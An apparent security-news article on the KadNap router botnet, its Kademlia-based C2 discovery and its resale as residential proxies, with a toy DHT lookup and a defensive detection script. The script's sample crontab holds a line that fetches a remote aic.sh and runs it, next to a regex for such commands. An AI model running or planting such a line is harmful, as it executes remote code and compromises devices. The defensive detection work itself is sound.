Shadow of the Router: How the “KadNap” Botnet Hijacked 14,000 ASUS Devices
Black Lotus Labs, the threat research team at Lumen Technologies, has identified a new botnet, KadNap, that has been active since August 2025. KadNap infects ASUS routers and other edge networking devices and turns them into proxies for malicious traffic. Within a few months the botnet has grown to roughly 14,000 nodes, forming infrastructure that criminals use to hide the origin of their attacks and to get around IP-based blocking.
The infected devices form a peer-to-peer network and locate the command-and-control (C2) infrastructure through a modified version of the Kademlia distributed hash table (DHT) protocol. This design makes the C2 servers hard to pinpoint: routing information is spread across the network, and each node holds only a fragment of it.
About half of the infected devices connect to C2 servers that serve only bots running on ASUS routers; the remainder connect to two other C2 clusters. The largest share of compromised systems, roughly 60 percent, is in the United States, with significant numbers in Taiwan, Hong Kong, and Russia.
Infection begins when a malicious script named aic.sh is fetched from a remote host. The script persists through a cron job that re-runs it every 55 minutes. The device then downloads an ELF binary named kad, which installs the KadNap client. On startup, the client determines the device's external IP address and queries a set of Network Time Protocol (NTP) servers to obtain the current time and the system's uptime.
KadNap uses its modified Kademlia implementation to stay hidden: a bot searches the DHT for peers and learns the location of the C2 infrastructure from them, which defeats monitoring and blocking that relies on fixed C2 addresses. The researchers did, however, find a weak point. Before a bot reaches the C2 servers, it first contacts a pair of hardcoded bootstrap nodes. This dependency undercuts the network's decentralization and gave investigators a foothold for mapping the rest of the C2 infrastructure.
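To make the two protocol points above concrete (routing state is spread across nodes, yet a fresh node can only join through contacts it already knows), here is a small Kademlia FIND_NODE lookup. It is an added example written for this article, not code from the Lumen report or from KadNap, whose specific changes to Kademlia are not described here. It assumes a 32-bit keyspace, K=4 contacts per bucket and a constructed network of 200 random IDs; the two bootstrap IDs stand in for the hardcoded nodes the report describes.

```python
"""Toy Kademlia FIND_NODE lookup over a 32-bit XOR keyspace (added example, not KadNap code).

Each node holds only K contacts per bucket, yet any ID can be located in a handful of hops,
and a node that knows nobody cannot join at all, so every fresh bot's first hop is a
bootstrap contact.
"""
import random
from typing import Dict, List, Optional, Set, Tuple

ID_BITS = 32   # assumed keyspace width for the toy; real Kademlia uses 160-bit IDs
K = 4          # contacts kept per k-bucket and returned per FIND_NODE reply


def xor_distance(a: int, b: int) -> int:
    """Kademlia's metric: the distance between two IDs is their bitwise XOR."""
    return a ^ b


def bucket_index(owner: int, other: int) -> int:
    """Bucket on `owner` that holds `other`: the position of the highest differing bit."""
    return xor_distance(owner, other).bit_length() - 1


class Node:
    def __init__(self, node_id: int) -> None:
        self.node_id = node_id
        self.buckets: Dict[int, Set[int]] = {}

    def add_contact(self, other: int) -> None:
        """Insert a peer into its bucket, capping each bucket at K entries (no eviction policy)."""
        bucket = self.buckets.setdefault(bucket_index(self.node_id, other), set())
        if len(bucket) < K:
            bucket.add(other)

    def find_node(self, target: int) -> List[int]:
        """Answer a FIND_NODE RPC: the K contacts this node knows that are closest to target."""
        known = [c for bucket in self.buckets.values() for c in bucket]
        return sorted(known, key=lambda c: xor_distance(c, target))[:K]


def build_network(n: int, seed: int = 7) -> Dict[int, Node]:
    """Constructed test network: n random IDs, each node's buckets filled from a shuffled peer list."""
    rng = random.Random(seed)
    ids = rng.sample(range(1 << ID_BITS), n)
    nodes = {i: Node(i) for i in ids}
    for node in nodes.values():
        peers = [p for p in ids if p != node.node_id]
        rng.shuffle(peers)  # random fill order, so crowded buckets keep a random K-subset
        for p in peers:
            node.add_contact(p)
    return nodes


def iterative_lookup(nodes: Dict[int, Node], bootstrap: List[int],
                     target: int) -> Tuple[Optional[int], List[int]]:
    """Locate `target` starting from only the bootstrap contacts.

    Returns (closest ID found, IDs queried in order). Every queried node answers
    with contacts that share more leading bits with the target than it does, so
    the distance loses at least one bit per hop. The path always starts at a
    bootstrap node, and an empty bootstrap list yields (None, []).
    """
    known: Set[int] = set(bootstrap)
    queried: List[int] = []
    while True:
        closest = sorted(known, key=lambda c: xor_distance(c, target))[:K]
        pending = [c for c in closest if c not in queried]
        if not pending:          # the K closest contacts we know have all been asked
            break
        q = pending[0]
        queried.append(q)
        known.update(nodes[q].find_node(target))
    best = min(known, key=lambda c: xor_distance(c, target), default=None)
    return best, queried


if __name__ == "__main__":
    net = build_network(200)
    ids = sorted(net)
    bootstrap = ids[:2]               # stands in for the two hardcoded nodes
    target = ids[-1]
    found, path = iterative_lookup(net, bootstrap, target)
    print(f"found: {found == target}, hops: {len(path)}, first hop was bootstrap: {path[0] in bootstrap}")
    print("join with no bootstrap:", iterative_lookup(net, [], target))
```

The lookup never touches more than a few nodes out of 200, which is why no single bot holds a usable map of the network. The flip side is the last line: with nothing hardcoded a bot cannot join, so the operators had to ship fixed contacts, and a sensor watching those two addresses sees the first hop of every new infection.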
The analysis also ties KadNap to the Doppelganger proxy service. According to Lumen, Doppelganger may be a rebrand of the Faceless platform, which was previously associated with the TheMoon botnet, itself known for compromising ASUS routers. The service sells access to the infected devices as "residential" proxies. Routing traffic through them lets attackers hide the real origin of their activity and bypass geographic and IP-based blocking.
Such proxies are commonly used for distributed denial-of-service (DDoS) attacks, password brute-forcing, and large-scale credential stuffing. In each case the malicious traffic appears to come from the compromised devices rather than from the attacker.
The report's authors advise network administrators to watch for unexpected cron entries, periodic connections to unknown external hosts, and downloads of unfamiliar files onto edge devices; these are the indicators of a KadNap infection. Regular auditing of routers and other edge hardware, together with blocking of suspicious connections, limits the spread of the botnet and reduces the capacity of the proxy service built on it.
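The infection chain and the advice above translate into two checks an administrator can run over artifacts pulled from a device: a crontab scan for short-cycle jobs that fetch and execute remote code (or name aic.sh), and a beacon check over outbound connections for external hosts contacted at a steady interval. The following is an added example written for this article, not tooling from Lumen or from the report. The crontab and connection log are constructed samples; the hosts 203.0.113.10 and 198.51.100.7 are documentation addresses standing in for attacker infrastructure, the log format is assumed, and the report does not publish the exact cron line KadNap installs, so the sample only mimics its described behaviour (a sub-hourly fetch-and-run of aic.sh).

```python
"""Triage helpers for the indicators the report highlights on edge devices (added example):
a cron job that re-fetches a remote script on a short cycle, and outbound connections that
recur at a fixed interval. Not part of the Lumen report or of KadNap.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, Tuple

# Ranges treated as "internal". Documentation ranges such as 203.0.113.0/24 are deliberately
# left external so they can stand in for attacker hosts in the constructed samples below.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# A download tool whose output is piped straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(wget|curl)\b.*\|\s*(sh|bash|ash)\b")

# Constructed crontab: a benign job, a line mimicking the aic.sh pattern (host and path are
# made up), and a benign job whose name happens to end in ".sh".
SAMPLE_CRONTAB = """\
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/55 * * * * wget -qO- http://203.0.113.10/aic.sh | sh
30 2 * * 0 /opt/backup/run_backup.sh
"""

# Constructed outbound-connection log, "<ISO timestamp> <dst-ip>:<port>" per line:
# a 55-minute beacon to 203.0.113.10, irregular traffic to 198.51.100.7, regular internal SMB.
SAMPLE_CONNECTIONS = [
    "2025-11-02T10:00:00 203.0.113.10:443",
    "2025-11-02T10:03:11 198.51.100.7:443",
    "2025-11-02T10:04:02 198.51.100.7:443",
    "2025-11-02T10:10:00 192.168.1.50:445",
    "2025-11-02T10:55:00 203.0.113.10:443",
    "2025-11-02T11:10:00 192.168.1.50:445",
    "2025-11-02T11:50:00 203.0.113.10:443",
    "2025-11-02T12:10:00 192.168.1.50:445",
    "2025-11-02T12:45:00 203.0.113.10:443",
    "2025-11-02T13:20:45 198.51.100.7:443",
]


def suspicious_cron_entries(crontab: str) -> List[str]:
    """Return crontab lines that run on a sub-hourly cycle and fetch-and-execute remote code,
    or that reference the script name given in the report."""
    flagged = []
    for raw in crontab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)            # five schedule fields + the command
        if len(fields) < 6:
            continue
        minute, command = fields[0], fields[5]
        sub_hourly = minute == "*" or minute.startswith("*/")
        if (sub_hourly and FETCH_AND_RUN.search(command)) or "aic.sh" in command:
            flagged.append(line)
    return flagged


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def periodic_external_destinations(log_lines: List[str], min_hits: int = 3,
                                   max_jitter_s: float = 60.0) -> List[Tuple[str, int]]:
    """Find external destinations contacted at a steady interval (beaconing).

    Returns (destination, mean gap in seconds) for each external host seen at least
    `min_hits` times whose gaps between connections vary by at most `max_jitter_s`.
    """
    seen: Dict[str, List[datetime]] = defaultdict(list)
    for line in log_lines:
        stamp, dst = line.split()
        if is_internal(dst.rsplit(":", 1)[0]):
            continue
        seen[dst].append(datetime.fromisoformat(stamp))
    beacons = []
    for dst, stamps in seen.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if pstdev(gaps) <= max_jitter_s:
            beacons.append((dst, round(mean(gaps))))
    return sorted(beacons)


if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("suspicious cron:", entry)
    for dst, interval in periodic_external_destinations(SAMPLE_CONNECTIONS):
        print(f"beacon to {dst} every {interval // 60} min")
```

On a real device the inputs would be the contents of the cron spool (and any rc scripts that re-create it) and a connection log or flow export from the router or an upstream sensor. The jitter threshold is the knob to tune: cron-driven beacons are nearly exact, so a tight bound like 60 seconds separates them from ordinary bursty traffic while still catching a 55-minute cycle.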